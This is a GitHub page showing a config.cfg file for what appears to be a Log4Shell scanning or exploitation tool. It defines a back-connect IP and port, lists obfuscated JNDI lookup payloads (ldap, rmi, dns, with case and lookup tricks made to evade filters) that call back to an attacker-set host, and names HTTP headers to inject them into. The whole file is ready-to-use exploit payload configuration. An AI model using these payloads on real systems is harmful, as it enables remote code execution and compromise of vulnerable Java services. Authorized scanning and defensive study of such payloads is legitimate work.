-
Notifications
You must be signed in to change notification settings - Fork 0
/
config.cfg
38 lines (36 loc) · 1.69 KB
/
config.cfg
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
# back connect parameters
back_connect_IP=0.0.0.0
back_connect_PORT=8080
# injection strings
INJ_STRING:${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://<IP>:<PORT>/<RND>}
INJ_STRING:${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://<IP>:<PORT>/<RND>}
INJ_STRING:${${::-j}ndi:rmi://<IP>:<PORT>/<RND>}
INJ_STRING:${${::-j}ndi:ldap://<IP>:<PORT>/<RND>}
INJ_STRING:${jndi:rmi://<IP>:<PORT>}
INJ_STRING:{${lower:jndi}:${lower:rmi}://<IP>:<PORT>/<RND>}
INJ_STRING:{${lower:${lower:jndi}}:${lower:rmi}://<IP>:<PORT>/<RND>}
INJ_STRING:{${lower:j}${lower:n}${lower:d}i:${lower:rmi}://<IP>:<PORT>/<RND>}
INJ_STRING:{${lower:j}${lower:n}${lower:d}i:${lower:ldap}://<IP>:<PORT>/<RND>}
INJ_STRING:{${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://<IP>:<PORT>/<RND>}
INJ_STRING:{${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}d${lower:a}}p://<IP>:<PORT>/<RND>}
INJ_STRING:{jndi:dns://<IP>:<PORT>}
INJ_STRING:${jndi:ldap://<IP>:<PORT>/<RND>}
INJ_STRING:${jnd${123%25ff:-${123%25ff:-i:}}ldap://<IP>:<PORT>/<RND>}
INJ_STRING:${j${k8s:k5:-ND}${sd:k5:-${123%25ff:-${123%25ff:-${upper:ı}:}}}ldap://<IP>:<PORT>/<RND>}
INJ_STRING:${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://<IP>:<PORT>/<RND>}
# injection points
INJ_POINT:HEADER:User-Agent
INJ_POINT:HEADER:referer
INJ_POINT:HEADER:x-http-host-override
INJ_POINT:HEADER:true-client-ip
INJ_POINT:HEADER:x-forwarded-port
INJ_POINT:HEADER:x-client-ip
INJ_POINT:HEADER:cf-connecting_ip
INJ_POINT:HEADER:x-forwarded-host
INJ_POINT:HEADER:client-ip
INJ_POINT:HEADER:x-forwarded-for
INJ_POINT:HEADER:x-originating-ip
INJ_POINT:HEADER:x-host
INJ_POINT:HEADER:forwarded
INJ_POINT:HEADER:x-real-ip
INJ_POINT:GET:<RND>